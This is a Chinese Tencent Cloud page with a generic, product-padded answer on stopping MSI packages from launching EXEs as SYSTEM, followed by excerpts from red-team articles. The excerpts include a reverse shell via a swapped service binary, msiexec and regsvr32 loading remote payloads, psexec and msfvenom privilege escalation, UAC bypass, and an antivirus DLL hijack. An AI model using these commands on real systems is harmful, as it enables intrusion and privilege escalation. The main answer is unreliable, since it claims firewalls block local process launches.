首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

阻止MSI在SYSTEM上下文中启动EXE

阻止MSI在SYSTEM上下文中启动EXE的方法有很多种,以下是一些常见的方法:

  1. 使用Windows防火墙:可以设置防火墙规则,阻止MSI在SYSTEM上下文中启动EXE。
  2. 使用应用程序白名单:可以设置只允许特定的应用程序在SYSTEM上下文中启动EXE。
  3. 使用软件限制策略:可以设置限制特定应用程序在SYSTEM上下文中启动EXE的策略。
  4. 使用安全软件:可以使用安全软件来检测和阻止MSI在SYSTEM上下文中启动EXE。
  5. 使用操作系统的安全设置:可以使用操作系统的安全设置来限制MSI在SYSTEM上下文中启动EXE。

推荐的腾讯云相关产品:

  • 腾讯云防火墙:提供了丰富的防火墙规则,可以有效地阻止MSI在SYSTEM上下文中启动EXE。
  • 腾讯云应用安全:提供了应用程序白名单和限制策略,可以有效地阻止MSI在SYSTEM上下文中启动EXE。
  • 腾讯云安全中心:提供了安全检测和阻止MSI在SYSTEM上下文中启动EXE的功能。
  • 腾讯云虚拟私有云:提供了操作系统的安全设置,可以有效地限制MSI在SYSTEM上下文中启动EXE。

产品介绍链接地址:

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

红队测试之Windows提权小结

这些服务可以计算机启动时自动启动,可以暂停和重新启动而且不显示任何用户界面。这种服务非常适合在服务器上使用,或任何时候,为了不影响同一台计算机上工作的其他用户,需要长时间运行功能时使用。...还可以不同登录用户的特定用户帐户或默认计算机帐户的安全上下文中运行服务。Windows服务(Windows Services)通常使用本地系统账户启动。...如果我们拥有可以修改服务配置权限的话,可以将服务启动的二进制文件替换成恶意的二进制文件,重新启动服务后执行恶意的二进制文件,可以获取到system权限。...1)停止USOSVC 服务 PS C:\Windows\system32> sc stop UsoSvc 2)将服务执行的exe文件修改为nc,反弹shell PS C:\Windows\system32...3.攻击机启动监听,获取反弹shell。 ?

1.1K20

常用软件打包类型及静默安装参数(nsis|msi|InstallShield|Inno)

一、Microsoft Windows Installer 如果软件是用 Windows Installer 打包的,可以文件夹中看到 *.msi 后缀的文件。...为了阻止某些程序安装成功后自动重启动(例如 Kerio Personal Firewall 4),你可以 /qn 或者 /qb 参数后使用 REBOOT=Suppress 标记。...有一点非常重要,安装结束后不能选择“立刻重启动计算机”。如果选了,批处理文件中的其他命令就会因为计算机重启动而无法执行。...四、InstallShield with MSI InstallShield with MSI 制作的安装文件,请使用类似:setup.exe /s /v "/qb" 来安装。...: /T 测试模式 /X 路径名 将文件提取到路径名中 /Z 路径名 将文件提取到路径名并重新启动 /S 静默安装 /M 提示输入windows、system、temp目录(/M=文件名-指定一个类似于

14.3K22
  • Visual Studio Installer打包安装项目VS2015

    第四步,添加卸载程序 既然有安装就有卸载,卸载程序其实是一个Windows操作系统自带的程序(C:Windows\System32\Msiexec.exe),只不过是通过给它传特殊的参数命令,来让它执行卸载...添加和设置卸载程序的操作如下: 首先,将卸载程序放在“应用程序文件夹”目录下,右键“应用程序文件夹”,添加——文件,系统盘下找到这个路径文件——C:Windows\System32\Msiexec.exe...(比如要求必须先安装指定的.net FrameWork版本才可以启动)等,可以右键安装项目,View中可以进行选择设置,如下 ?...选择“从组件供应商的网站上下载系统必备组件”,这样一来,即使电脑上没有安装需要的.net Framework也不要紧,只要设置了这项,安装程序会自动从微软的官网上下载对应的组件并安装,是不是很方便 第七步...生成的setup.exe与setup.msi的区别 setup.exe里边包含了对安装程序的一些条件的检测,比如需要.net的版本是否安装等,当条件具备后,setup.exe接着调用setup.msi,

    1.5K31

    恶意软件Purple Fox 伪装成 Telegram 安装程序传播

    Purple Fox于 2018 年 3 月首次被发现,并以名为“.msi ”软件包的形式互联网分发。当时,专家们近 2000 台受感染的 Windows 服务器上发现了该软件包。...执行时,TextInputh.exe会继续C:\Users\Public\Videos\目录下创建一个名为“1640618495”的文件夹,然后从C2服务器将“1.rar”、“7zz.exe”文件下载到新建的文件夹中...· exe – 这个文件被用来关闭和阻止 360 AV 的启动 · sys – 删除此文件后,会在受感染的 PC 上创建并启动一个名为“Driver”的新系统驱动程序服务,并在 ProgramData...· hg – SQLite 文件 上述文件被用来阻止 360 AV 进程的启动,最终阻止检测的有效载荷,也就顺理成章实现了Purple Fox 的后门功能。...最后一步也是最关键的一步,Purple Fox被作为 .msi 文件从 C2 服务器下载,用于系统加密的 shellcode也一并被下载下来。

    64920

    渗透技巧——从Admin权限切换到System权限

    0x00 前言 渗透测试中,某些情况下需要用到system权限,例如操作注册表HKEY_LOCAL_MACHINE\SAM\SAM 恰巧最近看到了一篇文章介绍了几种获得system权限的方法,于是决定结合自己的经验对这方面的技巧做系统整理...命令: 创建服务,以system权限启动: schtasks /Create /TN TestService2 /SC DAILY /ST 00:36 /TR notepad.exe /RU SYSTEM...权限启动: psexec.exe -accepteula -s -d notepad.exe 默认情况下,system权限的进程不会在用户桌面显示,如果需要显示进程界面,可以加/i参数,命令如下: psexec.exe...msigen.msi文件会报错,如下图 使用light.exe能够成功生成msigen.msi,如下图 虽然报错,但不影响文件的生成和功能的执行 也就是说,完整编译命令如下: 直接双击执行msigen.msi...会弹框,启动的calc.exesystem权限 命令行下执行: msiexec /q /i msigen.msi 启动的calc.exe为high权限 0x04 利用token复制获得System权限

    1.7K70

    msi的简单使用

    vs 下载扩展 搜索创建msi文件即可 利用文件系统和自定义操作选项,可以设置将在目标主机上释放的文件和执行的命令 点击项目输出 打包exemsi 可以添加图标 创建快捷方式...扩展中可以对安装包的属性进行设置,部分属性会在msi文件的详细信息中体现,所以可以对属性进行一些伪造欺骗 如果选择True时,管理员权限下msiexec会使用SYSTEM权限执行安装: 启动条件...点击view->启动条件 可以设置硬件属性中的内存、分辨率来检测是否虚拟机里启动 比如这里要求物理内存必须大于多少字节才启动安装包 可以通过orca.exe来查看其他软件的启动条件设置,下载链接.../t5/InstallShield-Knowledge-Base/Common-MSI-Conditions/ta-p/3854 安装时可以使用msiexec /q /i MsiexecSetup.msi.../log 123.log方式输出日志文件,通过对比日志文件进行更详细的条件设置 打包exe/二进制文件 MSI安装包中可以添加exe、dll、vbs、js类型二进制文件或脚本。

    1.1K30

    虹科技术 | 终端入侵防御 | 重大攻击中发现新的Babuk勒索软件

    技 术 分 析部署开始域中大规模感染之前,攻击者域控制器中部署了以下恶意软件文件:·.bat 一个BAT脚本,负责检查安全解决方案的存在,并开始执行一个微软安装程序(.msi)·<file...这确保了.bat文件整个域中执行。执行msi安装程序包含四个文件:·SapphireIMSClient.exe,这个可执行文件是NTSD.exe--一个用于Windows的符号调试器工具。.../system.cpp)中的代码有高度的相似性。...MTD不影响可用性的情况下提出诱饵来欺骗和诱捕威胁。它阻止并暴露了依赖内存中动态执行的隐蔽性的攻击者。...市场领先的EDR,如CrowdStrike和SentinelOne,攻击发生时无法阻止新的Babuk变体。

    41820

    域渗透-横向移动命令总结

    ,注意"="后需要有一个空格, #远程主机上创建一个名为schtasksname的系统服务,服务启动时将执行上传的攻击载荷 sc \\10.10.10.19 start schtasksname..."C:\Windows\System32\cmd.exe /c C:\Windows\System32\regsvr.32.exe /s /n /u /i:http://192.168.2.143:8080...,禁止弹出许可证对话框;-u,指定远程主机的用户名;-p,指定用户的密码 #-S,以SYSTEM权限启动进程,如果未指定该参数,就将以管理员权限启动进程 在内网渗透中,如果已建立IPC$链接,那么可以直接使用...MSI; 二是远程部署WMI事件订阅,特定条的事件发生时触发攻击。...4444 -f msi -o reverse_tcp.msi一台测试人员可控的服务器上搭建SMB共享服务器,并将生成的MSI文件放入共享目录 mkdir /root/share python smbserver.py

    2.3K10

    windows提权看这一篇就够了

    利用方式: #把服务启动的行为(exe或者脚本,com组件..)替换成我们的MSF反弹木马,当服务重启时,就会给我们返回一个system权限的meterpreter set AutoRunScript...简介:windows操作系统提供了一个实用程序(schtasks.exe),使系统管理员能够特定的时间执行程序或脚本(大多数情况下,计划任务是以NT Authority\System高权限执行的),...文件,msi文件内包含要执行的Payload,Payload将会以System权限执行 msiexec /quiet /qn /i muma.msi #msf 需要一个会话 run exploit...(通过注册表,可以启用/禁用该设置,但您需要正确的权限才能执行此操作) 修改受保护的目录(例如Windows文件夹,Program Files) 计划任务(例如,以管理员权限自动启动) UAC不会自动阻止恶意软件...如果指定EXE ::Custom,则应在单独的进程中启动payload后调用ExitProcess() exploit/windows/local/bypassuac_comhijack#此模块将通过

    15.9K31

    windows提权看这一篇就够了

    利用方式: #把服务启动的行为(exe或者脚本,com组件..)替换成我们的MSF反弹木马,当服务重启时,就会给我们返回一个system权限的meterpreter set AutoRunScript...这是因为当一个服务Windows系统中启动后,它必须和服务控制管理器通信,如果没有通信,服务控制管理器会认为出现了错误,并会终止这个进程,我们所有需要做的就是终止载荷进程之前,将它迁移到其它进程。...文件,msi文件内包含要执行的Payload,Payload将会以System权限执行 msiexec /quiet /qn /i muma.msi #msf 需要一个会话 run exploit...(通过注册表,可以启用/禁用该设置,但您需要正确的权限才能执行此操作) 修改受保护的目录(例如Windows文件夹,Program Files) 计划任务(例如,以管理员权限自动启动) UAC不会自动阻止恶意软件...如果指定EXE ::Custom,则应在单独的进程中启动payload后调用ExitProcess() exploit/windows/local/bypassuac_comhijack#此模块将通过

    3.3K20

    Kaspersky AVP.exe DLL 劫持

    Kaspersky AVP.exe进程尝试加载缺少的wow64log.dllDLL文件(System32)。...通过DLL植入恶意文件,本地Windows管理员可以在这个受信任的AVP.exe进程的上下文中实现代码执行并杀死其他进程,从而在无法检测和清除病毒的杀毒软件上实现拒绝服务和以卡巴斯基的身份执行任意命令。...Service启动的进程为: ProCess Monitor AVP.exe 加载不存在的wow64log.dll,路径为C:\windows\System32\ Avpui.exe同样加载不存在的...但似乎卡巴斯基家族的所有进程都认为其他卡巴斯基进程自我保护方面是“受信任的”。因此,如果我们设法一个上下文中执行代码,我们就可以“攻击”并杀死其进程和在卡巴斯基中执行任意命令等等。...也可以卡巴是安全上下文中执行我们的shellcode 例如:

    76120

    红蓝对抗之无文件落地攻击

    端成功收到反弹的shell msiexec msiexec.exe属于系统进程,是Windows Installer的一部分,用于安装Windows Installer安装包(MSI),对系统的正常运行非常重要...> evil.msi Step 2:使用python开启一个简易的web服务器用于托管msi载荷 Step 3:攻击主机上使用nc监听端口 nc -lvp 6666 Step 4:目标主机中执行以下命令实现无文件落地执行载荷...msiexec /q /i http://192.168.174.129:1234/evil.msi Step 5:之后再web端成功接收到请求记录,同时NC端返回cmd命令交互 mshta mshta.exe...windows\system32文件夹下,2000系统的regsvr32.exewinnt\system32文件夹下,我们可以通过该命令来实现无文件落地攻击,和上面类似这里也借助JSRat来实现,首先我们本地运行...-p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f exe >shell.exe Step 2:启动MSF

    16410

    java卸载不了_java卸载不了怎么处理?卸载时总出现这个

    的解决方案: windows installer没有正确安装 到服务里停掉windows installer服务 然后下载InstMsiW.exe 右击msi.inf点击安装,右击mspatcha.inf...点击安装 再启用服务 控制面板里管理工具里有服务一项,点开以后在里面找到windows installer一项,将其开启就行了,一般的只有.msi文件才用到的 xp系统 开始运行输入 sc msiserver...2.下载InstMsiW.exe,用winrar解压开。进入目录。 3.右击msi.inf ,点击安装,右击mspatcha.inf ,点击安装。...第二步:重新启动电脑进入安全模式(启动时按F8键),然后点击开始-->运行,输入CMD命令,弹出的CMD命令提示符窗口中输入“msiexec /regserver”,最后重新启动系统即可。...:misiexec /regserver 2、“管理工具”→“服务”中启动windows Installer 症状三:Win2000/XP安装软件时提示“不能访问Windows Installer服务

    1.5K10
    领券